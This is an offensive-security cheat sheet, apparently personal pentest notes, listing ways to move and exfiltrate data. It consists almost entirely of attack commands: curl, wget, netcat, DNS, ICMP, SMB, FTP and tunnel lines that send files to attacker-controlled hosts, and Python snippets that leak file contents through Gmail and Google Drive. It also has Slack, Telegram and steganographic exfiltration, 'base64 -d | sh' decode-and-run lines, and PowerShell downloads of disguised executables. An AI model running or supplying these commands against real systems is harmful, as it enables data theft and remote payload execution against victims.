Basic Transfers (Upload / Download)
curl
# Download a file
curl http://attack_server/file.zip -o filename
# Upload a file
curl -T localfile.txt ftp://attack_server/upload/
wget
# Download from HTTP site
wget http://attack_server/file.zip -O filename
PowerShell
# Local copy across drives
Copy-Item -Path C:\source\path\file.txt -Destination D:\dest\path\text.txt
# Download file from URL
Invoke-WebRequest -Uri http://attack_server/file.zip -OutFile C:\path\to\save\file.zip
scp
# Upload
scp local_file.gz user@192.168.1.1:path/to/put/file
# Upload to Windows
scp local_file.gz user@192.168.1.1:"C:/path/to/put/file"
# Upload using key auth
scp -i mykey.pem somefile.txt root@my.ec2.id.amazonaws.com:/
# Download
scp user@remoteserver:/root/filename.rar ./local/path
scp -P [port] user@remoteserver:/root/filename.rar ./local/path
netcat (nc)
# On the attacker machine (listening)
nc -lvp 4444 > received_file
# On the victim machine (sending)
nc attacker_ip 4444 < file_to_send
Python HTTP Server
# Serve files from the current directory (Python 3)
python3 -m http.server 8000
# Serve files from the current directory (Python 2)
python -m SimpleHTTPServer 8000
Network Exfiltration
ICMP
# Send file data through ICMP packets
ping -c 1 -p $(cat file | xxd -p) target_ip
DNS
# Encode and send data via DNS requests
nslookup $(echo -n "data" | base64).domain.com attacker_ip
HTTP/S
# Exfiltrate via cURL
curl -X POST -d @file http://attacker.com/upload
# Exfiltrate via wget
wget --post-file=file http://attacker.com/upload
SMB
# Mount and copy data to remote SMB share
mount -t cifs //attacker_ip/share /mnt -o username=user,password=pass
cp file /mnt/
Fileless & Covert Channels
PowerShell
# Upload file via PowerShell web request
Invoke-WebRequest -Uri http://attacker.com/upload -Method POST -InFile file
DNS Tunnel (iodine)
# Set up a DNS tunnel for exfiltration
iodined -f -P password 10.0.0.1 attacker.com
FTP
# Send file via FTP
ftp attacker_ip
put file
Gmail API
# Send file content via email (Python example)
import smtplib
s = smtplib.SMTP('smtp.gmail.com', 587)
s.starttls()
s.login('attacker@gmail.com', 'password')
s.sendmail('attacker@gmail.com', 'receiver@gmail.com', open('file').read())
s.quit()
Data Encoding & Obfuscation
Base64
# Encode and decode a file
base64 file > file.b64
base64 -d file.b64 > file
# Decode + run in terminal
base64 -d file.enc | sh
# Decode + run, save output
base64 -d lp.enc | sh > linpeas_output.txt 2>&1
Hex
# Convert file to hex
xxd -p file > file.hex
# Convert hex back to original file
xxd -r -p file.hex > file
ROT13
# Encode and decode using ROT13
cat file | tr 'A-Za-z' 'N-ZA-Mn-za-m'
tar
# Create archive + compress from existing files
tar -czvf new_archive.tar.gz file1 file2
# List contents (without extracting)
tar -tf archive.tar
# Unpack
tar -xzvf archive.tar.gz
zip
# Create a zip archive
zip archive.zip file1 file2
# Unzip
unzip archive.zip
Cloud & Social Media Exfiltration
Google Drive API
# Upload file using Google Drive API (Python)
from pydrive.auth import GoogleAuth
from pydrive.drive import GoogleDrive
gauth = GoogleAuth()
gauth.LocalWebserverAuth()
drive = GoogleDrive(gauth)
file = drive.CreateFile({'title': 'exfiltrated.txt'})
file.SetContentFile('file.txt')
file.Upload()
Twitter (Stego Exfiltration)
# Hide data in an image and tweet
steghide embed -cf image.jpg -ef file -p password
twitcli tweet -m "Check out my new pic!" -f image.jpg
Slack/Discord Bots
# Use a bot to send exfiltrated data
curl -F "file=@file" -F "channels=CHANNEL_ID" -H "Authorization: Bearer TOKEN" https://slack.com/api/files.upload
Telegram Bot
# Send data using a Telegram bot
curl -F "document=@file" https://api.telegram.org/botTOKEN/sendDocument?chat_id=CHAT_ID
Miscellaneous Techniques
Audio
# Convert file to audio tones for exfiltration
cat file | minimodem --tx 1200 > audio.wav
Bluetooth
# Send data via Bluetooth
rfcomm connect hci0 attacker_mac
cat file > /dev/rfcomm0
Covert Print Jobs
# Hide data in a print job
lp -o raw file
TODO
Download
(New-Object Net.WebClient).DownloadFile("http://10.10.14.2:80/taskkill.exe","C:\Windows\Temp\taskkill.exe")
Invoke-WebRequest "http://10.10.14.2:80/taskkill.exe" -OutFile "taskkill.exe"
wget "http://10.10.14.2/nc.bat.exe" -OutFile "C:\ProgramData\unifivideo\taskkill.exe"
nxc / crackmap
nxc smb --get-file/--put-file